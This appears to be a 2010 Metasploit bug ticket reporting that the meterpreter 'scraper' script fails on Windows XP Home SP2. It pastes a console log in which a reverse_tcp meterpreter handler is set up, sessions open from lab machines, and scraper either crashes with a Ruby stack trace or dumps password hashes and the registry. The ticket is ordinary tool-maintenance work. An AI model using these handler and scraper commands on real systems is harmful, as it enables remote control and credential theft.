Bug #2233
Scraper fail on XP Home SP2
| Status: | Closed | Start date: | 07/12/2010 | |
|---|---|---|---|---|
| Priority: | Normal | Due date: | ||
| Assignee: | - | % Done: | 0% |
|
| Category: | - | |||
| Target version: | - | |||
| Resolution: | Release Note: |
Description
I was able to replicate the problem on a Home System but not on a Professional System, first machine is a WinXP SP2 Home and the second a WinXP SP2 Pro. Matt could you please open a ticket at http://www.metasploit.com/redmine/projects/framework/issues/new
Thanks,
Carlos
_ _ _ _
| | | | (_) |
_ __ ___ ___| |_ __ _ ___ _ __ | | ___ _| |_
| '_ ` _ \ / _ \ __/ _` / __| '_ \| |/ _ \| | __|
| | | | | | __/ || (_| \__ \ |_) | | (_) | | |_
|_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__|
| |
|_|
=[ metasploit v3.4.1-release [core:3.4 api:1.0]
+ -- --=[ 566 exploits - 282 auxiliary
+ -- --=[ 210 payloads - 27 encoders - 8 nops
=[ svn r9785 updated today (2010.07.11)
resource (resource/meterpreter_api.rc)> use exploit/multi/handler
resource (resource/meterpreter_api.rc)> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
resource (resource/meterpreter_api.rc)> set LHOST 192.168.1.100
LHOST => 192.168.1.100
resource (resource/meterpreter_api.rc)> set ExitOnSession false
ExitOnSession => false
resource (resource/meterpreter_api.rc)> exploit -j
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.1.100:4444
[*] Starting the payload handler...
msf exploit(handler) >
[*] Sending stage (748032 bytes) to 192.168.1.234
[*] Meterpreter session 1 opened (192.168.1.100:4444 -> 192.168.1.234:1038) at Mon Jul 12 08:20:54 -0400 2010
msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > getuid
Server username: CARLOS-B357C681\Owner
meterpreter > sysinfo
Computer: CARLOS-B357C681
OS : Windows XP (Build 2600, Service Pack 2).
Arch : x86
Language: en_US
meterpreter > run scraper
[*] New session on 192.168.1.234:1038...
[*] Gathering basic system information...
[*] Exception: Rex::Post::Meterpreter::RequestError stdapi_sys_process_execute: Operation failed: 2 /Users/cperez/trunk/lib/rex/post/meterpreter/extensions/stdapi/sys/process.rb:163:in `execute'/Users/cperez/trunk/lib/rex/script/base.rb:83:in `m_exec'/Users/cperez/trunk/lib/rex/script/base.rb:166:in `run'/Users/cperez/trunk/lib/rex/script/base.rb:165:in `open'/Users/cperez/trunk/lib/rex/script/base.rb:165:in `run'/Users/cperez/trunk/lib/rex/script/base.rb:41:in `run'/Users/cperez/trunk/lib/rex/post/meterpreter/client.rb:183:in `execute_file'/Users/cperez/trunk/lib/msf/base/sessions/meterpreter.rb:182:in `execute_script'/Users/cperez/trunk/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb:348:in `cmd_run'/Users/cperez/trunk/lib/rex/ui/text/dispatcher_shell.rb:246:in `send'/Users/cperez/trunk/lib/rex/ui/text/dispatcher_shell.rb:246:in `run_command'/Users/cperez/trunk/lib/rex/post/meterpreter/ui/console.rb:101:in `run_command'/Users/cperez/trunk/lib/rex/ui/text/dispatcher_shell.rb:208:in `run_single'/Users/cperez/trunk/lib/rex/ui/text/dispatcher_shell.rb:202:in `each'/Users/cperez/trunk/lib/rex/ui/text/dispatcher_shell.rb:202:in `run_single'/Users/cperez/trunk/lib/rex/post/meterpreter/ui/console.rb:67/Users/cperez/trunk/lib/rex/ui/text/shell.rb:131:in `call'/Users/cperez/trunk/lib/rex/ui/text/shell.rb:131:in `run'/Users/cperez/trunk/lib/rex/post/meterpreter/ui/console.rb:65:in `interact'/Users/cperez/trunk/lib/msf/base/sessions/meterpreter.rb:233:in `_interact'/Users/cperez/trunk/lib/rex/ui/interactive.rb:48:in `interact'/Users/cperez/trunk/lib/msf/ui/console/command_dispatcher/core.rb:1217:in `cmd_sessions'/Users/cperez/trunk/lib/rex/ui/text/dispatcher_shell.rb:246:in `send'/Users/cperez/trunk/lib/rex/ui/text/dispatcher_shell.rb:246:in `run_command'/Users/cperez/trunk/lib/rex/ui/text/dispatcher_shell.rb:208:in `run_single'/Users/cperez/trunk/lib/rex/ui/text/dispatcher_shell.rb:202:in `each'/Users/cperez/trunk/lib/rex/ui/text/dispatcher_shell.rb:202:in `run_single'/Users/cperez/trunk/lib/rex/ui/text/shell.rb:141:in `run'./msfconsole:112
meterpreter >
[*] Sending stage (748032 bytes) to 192.168.1.220
[*] Meterpreter session 2 opened (192.168.1.100:4444 -> 192.168.1.220:11105) at Mon Jul 12 08:22:10 -0400 2010
meterpreter > background
msf exploit(handler) > sessions -i 2
[*] Starting interaction with 2...
meterpreter > run scraper
[*] New session on 192.168.1.220:11105...
[*] Gathering basic system information...
[*] Dumping password hashes...
[*] Obtaining the entire registry...
[*] Exporting HKCU
[*] Downloading HKCU (C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\XulAaohn.reg)
[*] Cleaning HKCU
[*] Exporting HKLM
[*] Downloading HKLM (C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\yKjsYnyS.reg)
History
Updated by Joshua J. Drake 11 months ago
- Description updated (diff)